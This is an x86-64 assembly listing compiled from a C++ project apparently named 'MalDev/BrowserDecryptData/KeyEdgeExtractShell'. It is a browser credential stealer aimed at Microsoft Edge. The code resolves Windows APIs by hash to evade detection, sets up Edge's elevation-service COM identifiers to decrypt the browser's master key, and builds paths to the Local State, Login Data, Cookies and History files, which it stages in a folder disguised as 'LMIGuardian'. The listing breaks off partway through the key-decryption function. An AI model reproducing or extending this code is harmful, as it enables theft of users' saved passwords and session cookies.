; Listing generated by Microsoft (R) Optimizing Compiler Version 19.50.35730.0 

include listing.inc

INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES

PUBLIC	?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z		; GetProcessIdsByName
PUBLIC	?CreateCopyFile@@YA_NPEAD0@Z			; CreateCopyFile
PUBLIC	?DecryptKey@@YAXXZ				; DecryptKey
PUBLIC	main
EXTRN	?Base64Decode@@YAPEADPEBDAEAH@Z:PROC		; Base64Decode
EXTRN	??0ApiResolve@@QEAA@XZ:PROC			; ApiResolve::ApiResolve
EXTRN	??1ApiResolve@@QEAA@XZ:PROC			; ApiResolve::~ApiResolve
EXTRN	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z:PROC ; ApiResolve::GetModuleBaseAddress
EXTRN	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z:PROC	; ApiResolve::GetApiAddress
EXTRN	?CompareStringW@@YA_NPEB_W0@Z:PROC		; CompareStringW
EXTRN	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z:PROC	; FindPatternA
EXTRN	?CopyStringA@@YA_NPEBDPEAD_K@Z:PROC		; CopyStringA
EXTRN	?StrLen@@YA_KPEAD@Z:PROC			; StrLen
EXTRN	?AllocMemory@@YA_N_KPEAPEAX@Z:PROC		; AllocMemory
EXTRN	?FreeMemory@@YA_NPEAX@Z:PROC			; FreeMemory
EXTRN	__chkstk:PROC
; Function compile flags: /Odtp
_TEXT	SEGMENT
main	PROC
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\main.cpp
; Line 777
$LN3:
	sub	rsp, 40					; 00000028H
; Line 778
	call	?DecryptKey@@YAXXZ			; DecryptKey
	npad	1
; Line 779
	xor	eax, eax
	add	rsp, 40					; 00000028H
	ret	0
main	ENDP
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
apiResolve$ = 64
i$1 = 72
hr$ = 76
lpKernel32$ = 80
cookiesFilename$ = 88
historyFilename$ = 104
passwordFilename$ = 120
sMal$ = 136
network$ = 152
patternKey$ = 168
sOle32$ = 200
sUser32$ = 216
sShell32$ = 232
sOleAut32$ = 248
keyFileName$ = 264
sSubEdge$ = 280
sLocalState$ = 320
dwFileSize$ = 360
i$2 = 364
keyPointer$ = 368
sizeKeyB64$ = 376
length$ = 380
pLoadLibraryA$ = 384
EdgeIID$ = 392
EdgeCLSID$ = 408
hFile$ = 424
pCopyFileA$3 = 432
decryptedDataBSTR$ = 440
fileBuf$ = 448
hOle32$ = 456
hOleAut32$ = 464
pElevatorEdge$ = 472
tv1066 = 480
pSHGetFolderPathA$ = 488
bstrEncKey$ = 496
pCreateFileA$ = 504
pSysFreeString$ = 512
pCloseHandle$ = 520
dwLastError$ = 528
pWriteFile$4 = 536
pCoInitializeEx$ = 544
hFile$5 = 552
pReadFile$ = 560
pGetFileSize$ = 568
pSysStringByteLen$ = 576
pSysAllocStringByteLen$ = 584
pCoSetProxyBlanket$ = 592
pCoUninitialize$ = 600
pCoCreateInstance$ = 608
hashCopyFileA$6 = 616
hashSleep$7 = 620
hashCoInitializeEx$ = 624
tv79 = 632
tv83 = 640
tv87 = 648
hShell32$ = 656
tv232 = 664
tv254 = 672
tv252 = 680
tv430 = 688
tv428 = 696
tv441 = 704
tv504 = 712
tv502 = 720
tv552 = 728
tv550 = 736
tv574 = 744
tv572 = 752
tv651 = 760
tv649 = 768
tv664 = 776
tv662 = 784
tv698 = 792
tv696 = 800
tv711 = 808
tv709 = 816
tv724 = 824
tv722 = 832
tv737 = 840
tv735 = 848
tv751 = 856
tv762 = 864
tv815 = 872
tv825 = 880
tv867 = 888
tv865 = 896
tv893 = 904
tv944 = 912
tv961 = 920
tv968 = 928
encKey$ = 936
tv991 = 944
tv1032 = 952
tv1036 = 960
tv1052 = 968
tv1059 = 976
tv1064 = 984
hashKernel32$ = 992
tv1089 = 1000
tv1096 = 1008
tv1103 = 1016
tv1107 = 1024
tv1111 = 1032
hashLoadLibraryA$ = 1040
hashSHGetFolderPathA$ = 1044
size$ = 1048
hashCreateFileA$ = 1052
hashGetFileSize$ = 1056
hashReadFile$ = 1060
hashCloseHandle$ = 1064
hashCoUninitialize$ = 1068
tv1068 = 1072
hashCoCreateInstance$ = 1080
hashCoSetProxyBlanket$ = 1084
hashSysAllocStringByteLen$ = 1088
hashSysStringByteLen$ = 1092
hashSysFreeString$ = 1096
hashWriteFile$8 = 1100
pSleep$9 = 1104
hUser32$ = 1112
orCookiesPath$ = 1120
pathMal$ = 1392
pathEdge$ = 1664
path$ = 1936
cookiesPath$ = 2208
keyPath$ = 2480
historyPath$ = 2752
orHistoryPath$ = 3024
passwordPath$ = 3296
orPasswordPath$ = 3568
?DecryptKey@@YAXXZ PROC					; DecryptKey
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\main.cpp
; Line 440
$LN43:
	push	rdi
	sub	rsp, 3840				; 00000f00H
; Line 441
	mov	DWORD PTR EdgeCLSID$[rsp], 533457260	; 1fcbe96cH
	mov	eax, 5783				; 00001697H
	mov	WORD PTR EdgeCLSID$[rsp+4], ax
	mov	eax, 17327				; 000043afH
	mov	WORD PTR EdgeCLSID$[rsp+6], ax
	mov	BYTE PTR EdgeCLSID$[rsp+8], 145		; 00000091H
	mov	BYTE PTR EdgeCLSID$[rsp+9], 64		; 00000040H
	mov	BYTE PTR EdgeCLSID$[rsp+10], 40		; 00000028H
	mov	BYTE PTR EdgeCLSID$[rsp+11], 151	; 00000097H
	mov	BYTE PTR EdgeCLSID$[rsp+12], 199	; 000000c7H
	mov	BYTE PTR EdgeCLSID$[rsp+13], 198	; 000000c6H
	mov	BYTE PTR EdgeCLSID$[rsp+14], 151	; 00000097H
	mov	BYTE PTR EdgeCLSID$[rsp+15], 103	; 00000067H
; Line 442
	mov	DWORD PTR EdgeIID$[rsp], -909985785	; c9c2b807H
	mov	eax, 30513				; 00007731H
	mov	WORD PTR EdgeIID$[rsp+4], ax
	mov	eax, 20276				; 00004f34H
	mov	WORD PTR EdgeIID$[rsp+6], ax
	mov	BYTE PTR EdgeIID$[rsp+8], 129		; 00000081H
	mov	BYTE PTR EdgeIID$[rsp+9], 183		; 000000b7H
	mov	BYTE PTR EdgeIID$[rsp+10], 68		; 00000044H
	mov	BYTE PTR EdgeIID$[rsp+11], 255		; 000000ffH
	mov	BYTE PTR EdgeIID$[rsp+12], 119		; 00000077H
	mov	BYTE PTR EdgeIID$[rsp+13], 121		; 00000079H
	mov	BYTE PTR EdgeIID$[rsp+14], 82		; 00000052H
	mov	BYTE PTR EdgeIID$[rsp+15], 43		; 0000002bH
; Line 443
	mov	QWORD PTR pElevatorEdge$[rsp], 0
; Line 446
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 447
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 448
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 449
	cmp	QWORD PTR lpKernel32$[rsp], 0
	jne	SHORT $LN8@DecryptKey
; Line 450
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN8@DecryptKey:
; Line 454
	mov	DWORD PTR hashLoadLibraryA$[rsp], -462133483 ; e4746715H
; Line 455
	mov	r8d, -462133483				; e4746715H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pLoadLibraryA$[rsp], rax
; Line 456
	cmp	QWORD PTR pLoadLibraryA$[rsp], 0
	jne	SHORT $LN9@DecryptKey
; Line 457
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN9@DecryptKey:
; Line 460
	mov	BYTE PTR sOle32$[rsp], 79		; 0000004fH
	mov	BYTE PTR sOle32$[rsp+1], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sOle32$[rsp+3], 51		; 00000033H
	mov	BYTE PTR sOle32$[rsp+4], 50		; 00000032H
	mov	BYTE PTR sOle32$[rsp+5], 46		; 0000002eH
	mov	BYTE PTR sOle32$[rsp+6], 100		; 00000064H
	mov	BYTE PTR sOle32$[rsp+7], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+8], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+9], 0
; Line 461
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv79[rsp], rax
	lea	rcx, QWORD PTR sOle32$[rsp]
	call	QWORD PTR tv79[rsp]
	mov	QWORD PTR hOle32$[rsp], rax
; Line 463
	mov	BYTE PTR sUser32$[rsp], 117		; 00000075H
	mov	BYTE PTR sUser32$[rsp+1], 115		; 00000073H
	mov	BYTE PTR sUser32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sUser32$[rsp+3], 114		; 00000072H
	mov	BYTE PTR sUser32$[rsp+4], 51		; 00000033H
	mov	BYTE PTR sUser32$[rsp+5], 50		; 00000032H
	mov	BYTE PTR sUser32$[rsp+6], 46		; 0000002eH
	mov	BYTE PTR sUser32$[rsp+7], 100		; 00000064H
	mov	BYTE PTR sUser32$[rsp+8], 108		; 0000006cH
	mov	BYTE PTR sUser32$[rsp+9], 108		; 0000006cH
	mov	BYTE PTR sUser32$[rsp+10], 0
; Line 464
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv83[rsp], rax
	lea	rcx, QWORD PTR sUser32$[rsp]
	call	QWORD PTR tv83[rsp]
	mov	QWORD PTR hUser32$[rsp], rax
; Line 466
	mov	BYTE PTR sShell32$[rsp], 83		; 00000053H
	mov	BYTE PTR sShell32$[rsp+1], 104		; 00000068H
	mov	BYTE PTR sShell32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sShell32$[rsp+3], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+4], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+5], 51		; 00000033H
	mov	BYTE PTR sShell32$[rsp+6], 50		; 00000032H
	mov	BYTE PTR sShell32$[rsp+7], 46		; 0000002eH
	mov	BYTE PTR sShell32$[rsp+8], 100		; 00000064H
	mov	BYTE PTR sShell32$[rsp+9], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+10], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+11], 0
; Line 467
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv87[rsp], rax
	lea	rcx, QWORD PTR sShell32$[rsp]
	call	QWORD PTR tv87[rsp]
	mov	QWORD PTR hShell32$[rsp], rax
; Line 475
	mov	DWORD PTR hashSHGetFolderPathA$[rsp], -1368526292 ; ae6df22cH
; Line 476
	mov	r8d, -1368526292			; ae6df22cH
	mov	rdx, QWORD PTR hShell32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSHGetFolderPathA$[rsp], rax
; Line 477
	cmp	QWORD PTR pSHGetFolderPathA$[rsp], 0
	jne	SHORT $LN10@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN10@DecryptKey:
; Line 478
	lea	rax, QWORD PTR path$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 479
	mov	rax, QWORD PTR pSHGetFolderPathA$[rsp]
	mov	QWORD PTR tv232[rsp], rax
	lea	rax, QWORD PTR path$[rsp]
	mov	QWORD PTR [rsp+32], rax
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 28
	xor	ecx, ecx
	call	QWORD PTR tv232[rsp]
	test	eax, eax
	je	SHORT $LN11@DecryptKey
; Line 480
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN11@DecryptKey:
; Line 483
	lea	rax, QWORD PTR pathEdge$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 484
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR pathEdge$[rsp]
	lea	rcx, QWORD PTR path$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 486
	mov	BYTE PTR sSubEdge$[rsp], 92		; 0000005cH
	mov	BYTE PTR sSubEdge$[rsp+1], 77		; 0000004dH
	mov	BYTE PTR sSubEdge$[rsp+2], 105		; 00000069H
	mov	BYTE PTR sSubEdge$[rsp+3], 99		; 00000063H
	mov	BYTE PTR sSubEdge$[rsp+4], 114		; 00000072H
	mov	BYTE PTR sSubEdge$[rsp+5], 111		; 0000006fH
	mov	BYTE PTR sSubEdge$[rsp+6], 115		; 00000073H
	mov	BYTE PTR sSubEdge$[rsp+7], 111		; 0000006fH
	mov	BYTE PTR sSubEdge$[rsp+8], 102		; 00000066H
	mov	BYTE PTR sSubEdge$[rsp+9], 116		; 00000074H
	mov	BYTE PTR sSubEdge$[rsp+10], 92		; 0000005cH
; Line 487
	mov	BYTE PTR sSubEdge$[rsp+11], 69		; 00000045H
	mov	BYTE PTR sSubEdge$[rsp+12], 100		; 00000064H
	mov	BYTE PTR sSubEdge$[rsp+13], 103		; 00000067H
	mov	BYTE PTR sSubEdge$[rsp+14], 101		; 00000065H
	mov	BYTE PTR sSubEdge$[rsp+15], 92		; 0000005cH
; Line 488
	mov	BYTE PTR sSubEdge$[rsp+16], 85		; 00000055H
	mov	BYTE PTR sSubEdge$[rsp+17], 115		; 00000073H
	mov	BYTE PTR sSubEdge$[rsp+18], 101		; 00000065H
	mov	BYTE PTR sSubEdge$[rsp+19], 114		; 00000072H
	mov	BYTE PTR sSubEdge$[rsp+20], 32		; 00000020H
	mov	BYTE PTR sSubEdge$[rsp+21], 68		; 00000044H
	mov	BYTE PTR sSubEdge$[rsp+22], 97		; 00000061H
	mov	BYTE PTR sSubEdge$[rsp+23], 116		; 00000074H
	mov	BYTE PTR sSubEdge$[rsp+24], 97		; 00000061H
	mov	BYTE PTR sSubEdge$[rsp+25], 92		; 0000005cH
; Line 489
	mov	BYTE PTR sSubEdge$[rsp+26], 68		; 00000044H
	mov	BYTE PTR sSubEdge$[rsp+27], 101		; 00000065H
	mov	BYTE PTR sSubEdge$[rsp+28], 102		; 00000066H
	mov	BYTE PTR sSubEdge$[rsp+29], 97		; 00000061H
	mov	BYTE PTR sSubEdge$[rsp+30], 117		; 00000075H
	mov	BYTE PTR sSubEdge$[rsp+31], 108		; 0000006cH
	mov	BYTE PTR sSubEdge$[rsp+32], 116		; 00000074H
; Line 490
	mov	BYTE PTR sSubEdge$[rsp+33], 0
; Line 492
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv254[rsp], rax
	lea	rcx, QWORD PTR pathEdge$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR pathEdge$[rsp+rax]
	mov	QWORD PTR tv252[rsp], rax
	mov	r8, QWORD PTR tv254[rsp]
	mov	rdx, QWORD PTR tv252[rsp]
	lea	rcx, QWORD PTR sSubEdge$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 495
	mov	BYTE PTR sLocalState$[rsp], 92		; 0000005cH
	mov	BYTE PTR sLocalState$[rsp+1], 77	; 0000004dH
	mov	BYTE PTR sLocalState$[rsp+2], 105	; 00000069H
	mov	BYTE PTR sLocalState$[rsp+3], 99	; 00000063H
	mov	BYTE PTR sLocalState$[rsp+4], 114	; 00000072H
	mov	BYTE PTR sLocalState$[rsp+5], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+6], 115	; 00000073H
	mov	BYTE PTR sLocalState$[rsp+7], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+8], 102	; 00000066H
	mov	BYTE PTR sLocalState$[rsp+9], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+10], 92	; 0000005cH
; Line 496
	mov	BYTE PTR sLocalState$[rsp+11], 69	; 00000045H
	mov	BYTE PTR sLocalState$[rsp+12], 100	; 00000064H
	mov	BYTE PTR sLocalState$[rsp+13], 103	; 00000067H
	mov	BYTE PTR sLocalState$[rsp+14], 101	; 00000065H
	mov	BYTE PTR sLocalState$[rsp+15], 92	; 0000005cH
; Line 497
	mov	BYTE PTR sLocalState$[rsp+16], 85	; 00000055H
	mov	BYTE PTR sLocalState$[rsp+17], 115	; 00000073H
	mov	BYTE PTR sLocalState$[rsp+18], 101	; 00000065H
	mov	BYTE PTR sLocalState$[rsp+19], 114	; 00000072H
	mov	BYTE PTR sLocalState$[rsp+20], 32	; 00000020H
	mov	BYTE PTR sLocalState$[rsp+21], 68	; 00000044H
	mov	BYTE PTR sLocalState$[rsp+22], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+23], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+24], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+25], 92	; 0000005cH
; Line 498
	mov	BYTE PTR sLocalState$[rsp+26], 76	; 0000004cH
	mov	BYTE PTR sLocalState$[rsp+27], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+28], 99	; 00000063H
	mov	BYTE PTR sLocalState$[rsp+29], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+30], 108	; 0000006cH
	mov	BYTE PTR sLocalState$[rsp+31], 32	; 00000020H
	mov	BYTE PTR sLocalState$[rsp+32], 83	; 00000053H
	mov	BYTE PTR sLocalState$[rsp+33], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+34], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+35], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+36], 101	; 00000065H
; Line 499
	mov	BYTE PTR sLocalState$[rsp+37], 0
; Line 501
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	DWORD PTR size$[rsp], eax
; Line 502
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv430[rsp], rax
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR path$[rsp+rax]
	mov	QWORD PTR tv428[rsp], rax
	mov	r8, QWORD PTR tv430[rsp]
	mov	rdx, QWORD PTR tv428[rsp]
	lea	rcx, QWORD PTR sLocalState$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 504
	lea	rax, QWORD PTR pathMal$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 505
	mov	rax, QWORD PTR pSHGetFolderPathA$[rsp]
	mov	QWORD PTR tv441[rsp], rax
	lea	rax, QWORD PTR pathMal$[rsp]
	mov	QWORD PTR [rsp+32], rax
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 26
	xor	ecx, ecx
	call	QWORD PTR tv441[rsp]
	test	eax, eax
	je	SHORT $LN12@DecryptKey
; Line 506
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN12@DecryptKey:
; Line 509
	mov	BYTE PTR sMal$[rsp], 92			; 0000005cH
	mov	BYTE PTR sMal$[rsp+1], 76		; 0000004cH
	mov	BYTE PTR sMal$[rsp+2], 77		; 0000004dH
	mov	BYTE PTR sMal$[rsp+3], 73		; 00000049H
	mov	BYTE PTR sMal$[rsp+4], 71		; 00000047H
	mov	BYTE PTR sMal$[rsp+5], 117		; 00000075H
	mov	BYTE PTR sMal$[rsp+6], 97		; 00000061H
	mov	BYTE PTR sMal$[rsp+7], 114		; 00000072H
	mov	BYTE PTR sMal$[rsp+8], 100		; 00000064H
	mov	BYTE PTR sMal$[rsp+9], 105		; 00000069H
	mov	BYTE PTR sMal$[rsp+10], 97		; 00000061H
	mov	BYTE PTR sMal$[rsp+11], 110		; 0000006eH
	mov	BYTE PTR sMal$[rsp+12], 0
; Line 512
	lea	rax, QWORD PTR keyPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 513
	lea	rax, QWORD PTR cookiesPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 514
	lea	rax, QWORD PTR historyPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 515
	lea	rax, QWORD PTR passwordPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 517
	lea	rcx, QWORD PTR sMal$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv504[rsp], rax
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR pathMal$[rsp+rax]
	mov	QWORD PTR tv502[rsp], rax
	mov	r8, QWORD PTR tv504[rsp]
	mov	rdx, QWORD PTR tv502[rsp]
	lea	rcx, QWORD PTR sMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 519
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR keyPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 520
	mov	BYTE PTR keyFileName$[rsp], 92		; 0000005cH
	mov	BYTE PTR keyFileName$[rsp+1], 98	; 00000062H
	mov	BYTE PTR keyFileName$[rsp+2], 114	; 00000072H
	mov	BYTE PTR keyFileName$[rsp+3], 111	; 0000006fH
	mov	BYTE PTR keyFileName$[rsp+4], 119	; 00000077H
	mov	BYTE PTR keyFileName$[rsp+5], 115	; 00000073H
	mov	BYTE PTR keyFileName$[rsp+6], 101	; 00000065H
	mov	BYTE PTR keyFileName$[rsp+7], 114	; 00000072H
	mov	BYTE PTR keyFileName$[rsp+8], 107	; 0000006bH
	mov	BYTE PTR keyFileName$[rsp+9], 101	; 00000065H
	mov	BYTE PTR keyFileName$[rsp+10], 121	; 00000079H
	mov	BYTE PTR keyFileName$[rsp+11], 46	; 0000002eH
	mov	BYTE PTR keyFileName$[rsp+12], 100	; 00000064H
	mov	BYTE PTR keyFileName$[rsp+13], 98	; 00000062H
	mov	BYTE PTR keyFileName$[rsp+14], 0
; Line 521
	lea	rcx, QWORD PTR keyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv552[rsp], rax
	lea	rcx, QWORD PTR keyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR keyPath$[rsp+rax]
	mov	QWORD PTR tv550[rsp], rax
	mov	r8, QWORD PTR tv552[rsp]
	mov	rdx, QWORD PTR tv550[rsp]
	lea	rcx, QWORD PTR keyFileName$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 523
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR cookiesPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 524
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR historyPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 525
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR passwordPath$[rsp]
	lea	rcx, QWORD PTR pathMal$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 526
	mov	BYTE PTR historyFilename$[rsp], 92	; 0000005cH
	mov	BYTE PTR historyFilename$[rsp+1], 72	; 00000048H
	mov	BYTE PTR historyFilename$[rsp+2], 105	; 00000069H
	mov	BYTE PTR historyFilename$[rsp+3], 115	; 00000073H
	mov	BYTE PTR historyFilename$[rsp+4], 116	; 00000074H
	mov	BYTE PTR historyFilename$[rsp+5], 111	; 0000006fH
	mov	BYTE PTR historyFilename$[rsp+6], 114	; 00000072H
	mov	BYTE PTR historyFilename$[rsp+7], 121	; 00000079H
	mov	BYTE PTR historyFilename$[rsp+8], 0
; Line 527
	mov	BYTE PTR cookiesFilename$[rsp], 92	; 0000005cH
	mov	BYTE PTR cookiesFilename$[rsp+1], 67	; 00000043H
	mov	BYTE PTR cookiesFilename$[rsp+2], 111	; 0000006fH
	mov	BYTE PTR cookiesFilename$[rsp+3], 111	; 0000006fH
	mov	BYTE PTR cookiesFilename$[rsp+4], 107	; 0000006bH
	mov	BYTE PTR cookiesFilename$[rsp+5], 105	; 00000069H
	mov	BYTE PTR cookiesFilename$[rsp+6], 101	; 00000065H
	mov	BYTE PTR cookiesFilename$[rsp+7], 115	; 00000073H
	mov	BYTE PTR cookiesFilename$[rsp+8], 0
; Line 528
	mov	BYTE PTR passwordFilename$[rsp], 92	; 0000005cH
	mov	BYTE PTR passwordFilename$[rsp+1], 76	; 0000004cH
	mov	BYTE PTR passwordFilename$[rsp+2], 111	; 0000006fH
	mov	BYTE PTR passwordFilename$[rsp+3], 103	; 00000067H
	mov	BYTE PTR passwordFilename$[rsp+4], 105	; 00000069H
	mov	BYTE PTR passwordFilename$[rsp+5], 110	; 0000006eH
	mov	BYTE PTR passwordFilename$[rsp+6], 32	; 00000020H
	mov	BYTE PTR passwordFilename$[rsp+7], 68	; 00000044H
	mov	BYTE PTR passwordFilename$[rsp+8], 97	; 00000061H
	mov	BYTE PTR passwordFilename$[rsp+9], 116	; 00000074H
	mov	BYTE PTR passwordFilename$[rsp+10], 97	; 00000061H
	mov	BYTE PTR passwordFilename$[rsp+11], 0
; Line 530
	lea	rcx, QWORD PTR cookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv574[rsp], rax
	lea	rcx, QWORD PTR cookiesPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR cookiesPath$[rsp+rax]
	mov	QWORD PTR tv572[rsp], rax
	mov	r8, QWORD PTR tv574[rsp]
	mov	rdx, QWORD PTR tv572[rsp]
	lea	rcx, QWORD PTR cookiesFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 531
	lea	rcx, QWORD PTR historyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv651[rsp], rax
	lea	rcx, QWORD PTR historyPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR historyPath$[rsp+rax]
	mov	QWORD PTR tv649[rsp], rax
	mov	r8, QWORD PTR tv651[rsp]
	mov	rdx, QWORD PTR tv649[rsp]
	lea	rcx, QWORD PTR historyFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 532
	lea	rcx, QWORD PTR passwordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv664[rsp], rax
	lea	rcx, QWORD PTR passwordPath$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR passwordPath$[rsp+rax]
	mov	QWORD PTR tv662[rsp], rax
	mov	r8, QWORD PTR tv664[rsp]
	mov	rdx, QWORD PTR tv662[rsp]
	lea	rcx, QWORD PTR passwordFilename$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 534
	lea	rax, QWORD PTR orCookiesPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 535
	lea	rax, QWORD PTR orHistoryPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 536
	lea	rax, QWORD PTR orPasswordPath$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 537
